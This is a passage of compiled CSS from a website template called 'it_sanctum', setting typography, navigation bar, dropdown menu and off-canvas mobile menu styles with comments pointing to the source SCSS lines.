  border: 1px solid #ddd !important;
  padding: 1rem !important;
}
/* line 106, templates/it_sanctum/scss/sanctum/_typography.scss */
hr {
  border-bottom: 1px solid #ddd;
}
/* line 108, templates/it_sanctum/scss/sanctum/_typography.scss */
hr.uk-article-divider {
  border-color: #ddd;
  margin-bottom: 35px;
}
/* line 114, templates/it_sanctum/scss/sanctum/_typography.scss */
* + .uk-article-divider {
  margin-top: 35px;
}
/* line 118, templates/it_sanctum/scss/sanctum/_typography.scss */
.uk-table-hover tbody tr:hover {
  background: #ddd;
}
/* line 122, templates/it_sanctum/scss/sanctum/_typography.scss */
.uk-badge {
  margin-right: 5px;
}
/* line 126, templates/it_sanctum/scss/sanctum/_typography.scss */
/* line 127, templates/it_sanctum/scss/sanctum/_typography.scss */
.g-typography-page > section {
  margin-top: 150px;
}
/* line 129, templates/it_sanctum/scss/sanctum/_typography.scss */
.g-typography-page > section:first-child {
  margin-top: 0;
}
/* line 135, templates/it_sanctum/scss/sanctum/_typography.scss */
iframe {
  border: none;
}
/* line 139, templates/it_sanctum/scss/sanctum/_typography.scss */
/* line 140, templates/it_sanctum/scss/sanctum/_typography.scss */
.uk-accordion .uk-accordion-title {
  background: #ddd;
  border: 1px solid #ddd;
  border-radius: 3px;
}
/* line 147, templates/it_sanctum/scss/sanctum/_typography.scss */
.uk-tab-grid::before {
  border-color: #ddd;
}
/* line 1, templates/it_sanctum/scss/sanctum/_navigation.scss */
#g-navigation {
  background-color: #fff;
  color: #008056;
  text-align: center;
  position: relative;
  z-index: 1002;
}
/* line 14, templates/it_sanctum/scss/sanctum/_navigation.scss */
#g-navigation h1, #g-navigation h2, #g-navigation h3, #g-navigation h4, #g-navigation h5, #g-navigation h6, #g-navigation strong {
  color: #959595;
}
/* line 18, templates/it_sanctum/scss/sanctum/_navigation.scss */
#g-navigation > .g-container {
  position: relative;
}
/* line 22, templates/it_sanctum/scss/sanctum/_navigation.scss */
#g-navigation .g-content {
  padding-top: 0;
  padding-bottom: 0;
  margin-top: 0;
  margin-bottom: 0;
}
/* line 29, templates/it_sanctum/scss/sanctum/_navigation.scss */
#g-navigation.uk-active[data-uk-sticky] {
  box-shadow: 0 3px 3px rgba(0, 0, 0, 0.05);
}
/* line 35, templates/it_sanctum/scss/sanctum/_navigation.scss */
/* line 36, templates/it_sanctum/scss/sanctum/_navigation.scss */
/* line 37, templates/it_sanctum/scss/sanctum/_navigation.scss */
.uk-sticky-placeholder #g-navigation .uk-active {
  box-shadow: 0 3px 3px rgba(0, 0, 0, 0.05);
}
/* line 43, templates/it_sanctum/scss/sanctum/_navigation.scss */
/* line 44, templates/it_sanctum/scss/sanctum/_navigation.scss */
/* line 45, templates/it_sanctum/scss/sanctum/_navigation.scss */
#g-navigation .align-left .g-toplevel, #g-header .align-left .g-toplevel {
  justify-content: flex-start;
  -webkit-justify-content: flex-start;
}
/* line 51, templates/it_sanctum/scss/sanctum/_navigation.scss */
/* line 52, templates/it_sanctum/scss/sanctum/_navigation.scss */
#g-navigation .align-right .g-toplevel, #g-header .align-right .g-toplevel {
  justify-content: flex-end;
  -webkit-justify-content: flex-end;
}
@media print {
  /* line 60, templates/it_sanctum/scss/sanctum/_navigation.scss */
  #g-navigation {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-toplevel > li > .g-menu-item-container, .g-main-nav .g-sublevel > li > .g-menu-item-container {
  padding: 0.2345rem 0.469rem;
  white-space: nowrap;
  -webkit-transition: background 0.2s, color 0.2s;
  -moz-transition: background 0.2s, color 0.2s;
  transition: background 0.2s, color 0.2s;
}
/* line 7, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-standard .g-dropdown {
  width: 180px;
  float: left;
}
/* line 13, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav {
  z-index: 20;
}
/* line 14, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 15, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 16, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 17, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 18, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav:not(.g-menu-hastouch) .g-toplevel > li > .g-menu-item-container .g-menu-parent-indicator {
  display: none;
}
/* line 24, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav:not(.g-menu-hastouch) .g-dropdown {
  z-index: 1003;
}
/* line 29, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 30, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 34, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 36, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 38, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-toplevel > li > .g-menu-item-container {
  line-height: 1;
}
/* line 43, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 44, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-toplevel > li > .g-menu-item-container > .g-menu-item-content {
  line-height: normal;
  text-align: center;
}
/* line 54, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-toplevel > li.g-parent .g-menu-parent-indicator:after {
  width: 1rem;
}
/* line 59, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-toplevel i {
  opacity: 1;
}
/* line 64, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 72, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 78, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-dropdown {
  text-align: left;
  border-radius: none;
}
/* line 81, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.dir-rtl .g-main-nav .g-dropdown {
  text-align: right;
}
/* line 86, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 87, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-sublevel > li {
  margin: 0;
  padding: 0;
}
/* line 90, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-sublevel > li > .g-menu-item-container {
  font-weight: normal;
}
/* line 94, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-sublevel > li > .g-menu-item-container > .g-menu-item-content {
  vertical-align: middle;
}
/* line 98, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 99, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-sublevel > li.g-parent .g-menu-parent-indicator {
  right: 10px;
  top: 13px;
}
/* line 102, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-sublevel > li.g-parent .g-menu-parent-indicator:after {
  content: "\f105";
  opacity: 0.75;
  font-size: 0.9rem;
}
/* line 109, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 110, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 111, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 112, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-sublevel > li:hover.g-parent .g-menu-parent-indicator:after {
  content: "\f105" !important;
}
/* line 121, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 122, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-fullwidth > .g-dropdown {
  margin: 0 1.563rem;
}
/* line 124, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-fullwidth > .g-dropdown[data-g-item-width] {
  margin-left: 0;
  margin-right: 0;
}
/* line 128, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 129, templates/it_sanctum/scss/sanctum/_mainnav.scss */
@media all and (-ms-high-contrast: none), (-ms-high-contrast: active) {
  .g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid {
    -webkit-flex-flow: row;
    -moz-flex-flow: row;
    flex-flow: row;
  }
}
/* line 134, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid .g-block {
  border-right: 1px solid rgba(255, 255, 255, 0.1);
}
/* line 136, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid .g-block:last-child {
  border-right: none;
}
/* line 142, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 143, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 147, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 148, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 149, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel > li:hover .g-menu-parent-indicator:after, .g-main-nav .g-fullwidth > .g-dropdown .g-sublevel > li.active .g-menu-parent-indicator:after {
  color: #008056;
  opacity: 1;
}
/* line 155, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel > li a {
  padding: 12px 20px !important;
}
/* line 162, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel .g-menu-parent-indicator {
  top: 10px !important;
}
/* line 164, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel .g-menu-parent-indicator:after {
  background: rgba(0, 0, 0, 0.99);
  color: #fff !important;
  border: 1px solid rgba(255, 255, 255, 0.3);
  border-radius: 4px;
  height: 1.5rem;
  width: 1.5rem !important;
  padding: 0.15rem;
  text-align: center;
  line-height: 18px;
  opacity: 1;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
/* line 177, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 178, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel .g-menu-parent-indicator:hover:after {
  background: rgba(77, 77, 77, 0.99);
}
/* line 189, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-menu-item-subtitle {
  opacity: 1;
}
/* line 199, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-menu-overlay.g-menu-overlay-open {
  z-index: 19;
}
/* line 204, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-standard .g-dropdown .flyout-left .g-dropdown {
  left: auto;
  right: 100%;
}
/* line 210, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 211, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 212, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 213, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 214, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 215, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 216, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-menu-hastouch .g-standard .g-toplevel > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator, .g-menu-hastouch .g-fullwidth .g-toplevel > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator {
  border-radius: 0;
  margin: -0.2rem 0 -0.2rem 0.5rem;
  padding: 0.2rem;
}
/* line 225, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 226, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 227, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 228, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 229, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-menu-hastouch .g-standard .g-sublevel > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator, .g-menu-hastouch .g-fullwidth .g-sublevel > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator {
  border-radius: 0;
  padding: 0.1rem;
  margin-top: -0.1rem;
  margin-right: -0.1rem;
}
/* line 243, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 244, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 245, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 246, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 247, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 248, templates/it_sanctum/scss/sanctum/_mainnav.scss */
[dir="rtl"] .g-main-nav .g-sublevel > li.g-parent .g-menu-item-content {
  margin-right: 0;
  margin-left: 2rem;
}
/* line 252, templates/it_sanctum/scss/sanctum/_mainnav.scss */
[dir="rtl"] .g-main-nav .g-sublevel > li.g-parent .g-menu-parent-indicator {
  right: auto;
  left: 10px;
  margin-top: 3px;
  -webkit-transform: rotate(180deg);
  -moz-transform: rotate(180deg);
  -ms-transform: rotate(180deg);
  -o-transform: rotate(180deg);
  transform: rotate(180deg);
}
/* line 261, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 262, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 263, templates/it_sanctum/scss/sanctum/_mainnav.scss */
[dir="rtl"] .g-main-nav .g-toplevel > li:last-child {
  margin-right: 5px !important;
  margin-left: 5px !important;
}
/* line 266, templates/it_sanctum/scss/sanctum/_mainnav.scss */
[dir="rtl"] .g-main-nav .g-toplevel > li:last-child .g-menu-item-container {
  padding-right: 1rem !important;
}
/* line 272, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 273, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 274, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 275, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 276, templates/it_sanctum/scss/sanctum/_mainnav.scss */
[dir="rtl"] .g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid .g-block {
  border-right: none;
  border-left: 1px solid rgba(255, 255, 255, 0.1);
}
/* line 279, templates/it_sanctum/scss/sanctum/_mainnav.scss */
[dir="rtl"] .g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid .g-block:last-child {
  border-left: none;
}
/* line 1, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 3, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav {
  margin: 0;
}
/* line 6, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 8, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-toplevel > li {
  margin: 0 5px;
  text-transform: uppercase;
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  #g-navigation .g-main-nav .g-toplevel > li {
    margin: 0;
  }
}
/* line 17, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container {
  color: #008056;
  padding: 1rem;
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  #g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container {
    padding: 0.5rem;
  }
}
@media only all and (max-width: 47.938rem) {
  #g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container {
    padding: 0.5rem;
  }
}
/* line 27, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container a {
  color: #008056;
}
/* line 29, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container a:hover {
  color: #4f953b;
}
/* line 36, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 37, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container .g-menu-parent-indicator:after {
  content: "\f107";
  opacity: 0.75;
  padding: 0.1rem;
  border: 1px solid #ddd;
  background: #f7f7f7;
  margin-left: 2px;
  border-radius: 4px;
  width: 1.2rem;
  text-align: center;
}
/* line 50, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 51, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-toplevel > li:hover > .g-menu-item-container, #g-navigation .g-main-nav .g-toplevel > li.active > .g-menu-item-container {
  color: #4f953b;
}
/* line 56, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-toplevel > li:hover > .g-menu-item-container > .g-selected, #g-navigation .g-main-nav .g-toplevel > li.active > .g-menu-item-container > .g-selected {
  color: #4f953b;
}
/* line 67, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-dropdown {
  text-transform: initial;
  color: #fff;
  background: rgba(0, 0, 0, 0.8);
  font-family: "Lato";
  border-radius: 0;
  box-shadow: 0 6px 6px rgba(0, 0, 0, 0.05);
}
/* line 78, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-dropdown .g-menu-item-container {
  color: #fff;
  padding: 12px 15px;
}
/* line 85, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-dropdown li {
  border-bottom: 1px solid rgba(255, 255, 255, 0.1);
}
/* line 88, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-dropdown .g-dropdown-column {
  border-bottom: none;
}
/* line 93, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 94, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 95, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-sublevel > li > .g-menu-item-container {
  color: #fff;
  font-weight: normal;
}
/* line 98, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-sublevel > li > .g-menu-item-container > .g-selected {
  color: #fff;
  font-weight: normal;
  background: #4f953b;
}
/* line 105, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 106, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-sublevel > li:hover > .g-menu-item-container, #g-navigation .g-main-nav .g-sublevel > li.active > .g-menu-item-container {
  background: #4f953b;
  color: #fff;
}
/* line 109, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-sublevel > li:hover > .g-menu-item-container > .g-selected, #g-navigation .g-main-nav .g-sublevel > li.active > .g-menu-item-container > .g-selected {
  background: #4f953b;
  color: #fff;
}
/* line 115, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 116, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-sublevel > li.active > .g-menu-item-container {
  color: #fff;
}
/* line 120, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 121, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 128, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-sublevel > li:last-child {
  border-bottom: none;
}
/* line 132, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 133, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 134, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-sublevel > li.g-menu-item-type-particle:hover > .g-menu-item-container {
  background: inherit;
}
/* line 142, templates/it_sanctum/scss/sanctum/_menu.scss */
@media only all and (max-width: 47.938rem) {
  #g-navigation .g-menu-block {
    display: none;
  }
}
/* line 147, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-menu-item-subtitle {
  font-size: 0.75rem;
  font-weight: normal;
  opacity: 1;
  padding-top: 5px;
}
/* line 155, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 156, templates/it_sanctum/scss/sanctum/_menu.scss */
.menu-item-particle a {
  color: #4f953b;
}
/* line 158, templates/it_sanctum/scss/sanctum/_menu.scss */
.menu-item-particle a:hover {
  color: #008056;
}
/* line 1, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas {
  background: #fff;
  width: 17rem;
  color: #959595;
}
/* line 5, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas a {
  color: #fff;
}
/* line 7, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas a:hover {
  color: #959595;
}
/* line 12, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas h1, #g-offcanvas h2, #g-offcanvas h3, #g-offcanvas h4, #g-offcanvas h5, #g-offcanvas h6, #g-offcanvas strong {
  color: #959595;
}
/* line 16, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas .button {
  background: #282828;
  color: #959595;
}
/* line 19, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas .button:hover {
  background: #353535;
}
/* line 22, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas .button:active {
  background: #1b1b1b;
}
/* line 29, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-offcanvas-toggle {
  font-size: 1.6rem;
  color: #959595;
  text-align: center;
  top: 0;
  left: initial;
  position: relative;
}
/* line 38, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 61, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 62, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 63, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul {
  background: #fff;
}
/* line 65, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li {
  -webkit-transition: background 0.2s, color 0.2s;
  -moz-transition: background 0.2s, color 0.2s;
  transition: background 0.2s, color 0.2s;
}
/* line 67, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li.g-menu-item-type-particle {
  display: none !important;
}
/* line 70, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li > .g-menu-item-container {
  color: #959595;
  border-bottom: 1px solid #f0f0f0;
}
/* line 74, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 75, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module):hover, #g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module).active {
  background: #f7f7f7;
}
/* line 78, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module):hover > .g-menu-item-container, #g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module).active > .g-menu-item-container {
  color: #626262;
}
/* line 82, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 83, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module).active > .g-menu-item-container {
  color: #fff;
  background: #4f953b;
}
/* line 89, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 90, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 91, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator {
  color: #fff;
  background: rgba(0, 0, 0, 0.3);
  -webkit-transition: background 0.2s, color 0.2s, border-color 0.2s;
  -moz-transition: background 0.2s, color 0.2s, border-color 0.2s;
  transition: background 0.2s, color 0.2s, border-color 0.2s;
  border-radius: 0;
  margin: -0.2rem 0 -0.2rem 0.5rem;
  padding: 0.2rem;
}
/* line 95, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator:hover {
  background: rgba(0, 0, 0, 0.5);
}
/* line 101, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator:after {
  content: "\f105";
  opacity: 0.75;
}
/* line 108, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 109, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li.g-parent .g-menu-parent-indicator {
  padding-right: 0.2rem;
}
/* line 110, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul > li.g-parent .g-menu-parent-indicator:after {
  content: "\f105";
}
/* line 117, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-offcanvas #g-mobilemenu-container ul .g-dropdown-column {
  width: 17rem;
}
/* line 124, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-mobilemenu-container {
  margin: -1.563rem;
}
/* line 129, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-nav-overlay, .g-menu-overlay {
  background: rgba(0, 0, 0, 0.6);
}
@media print {
  /* line 134, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  #g-offcanvas {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 140, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 141, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 142, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 143, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-left #g-page-surround {
  left: 17rem;
}
/* line 148, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 149, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-right #g-page-surround {
  right: 17rem;
}
/* line 156, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 157, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-offcanvas-open .g-nav-overlay {
  z-index: 1010;
}
/* line 160, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 161, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 162, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 163, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-left #g-header.uk-active, .g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-left #g-top.uk-active {
  margin-left: 17rem;
}
/* line 168, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 169, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 170, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-right #g-header.uk-active, .g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-right #g-top.uk-active {
  margin-left: -17rem;
}
/* line 178, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 179, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 180, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 181, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 182, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-offcanvas-closing.g-offcanvas-css2 .g-offcanvas-left #g-header.uk-active, .g-offcanvas-closing.g-offcanvas-css2 .g-offcanvas-left #g-top.uk-active {
  margin-left: 0;
}
/* line 187, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 188, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 189, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
.g-offcanvas-closing.g-offcanvas-css2 .g-offcanvas-right #g-header.uk-active, .g-offcanvas-closing.g-offcanvas-css2 .g-offcanvas-right #g-top.uk-active {
  margin-left: 0;
}
@media all and (-ms-high-contrast: none), (-ms-high-contrast: active) {
  /* line 199, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 200, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  .g-offcanvas-open .g-nav-overlay {
    z-index: 1010;
  }
  /* line 203, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 204, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 205, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  .g-offcanvas-open .g-offcanvas-left #g-header.uk-active, .g-offcanvas-open .g-offcanvas-left #g-top.uk-active {
    margin-left: 17rem;
  }
  /* line 210, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 211, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 212, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  .g-offcanvas-open .g-offcanvas-right #g-header.uk-active, .g-offcanvas-open .g-offcanvas-right #g-top.uk-active {
    margin-left: -17rem;
  }
  /* line 219, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 220, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 221, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 222, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  .g-offcanvas-closing .g-offcanvas-left #g-header.uk-active, .g-offcanvas-closing .g-offcanvas-left #g-top.uk-active {
    margin-left: 0;
  }
  /* line 227, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 228, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  /* line 229, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
  .g-offcanvas-closing .g-offcanvas-right #g-header.uk-active, .g-offcanvas-closing .g-offcanvas-right #g-top.uk-active {
    margin-left: 0;
  }
}
/* line 237, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
/* line 238, templates/it_sanctum/scss/sanctum/_offcanvas.scss */
#g-header.uk-active, #g-top.uk-active {
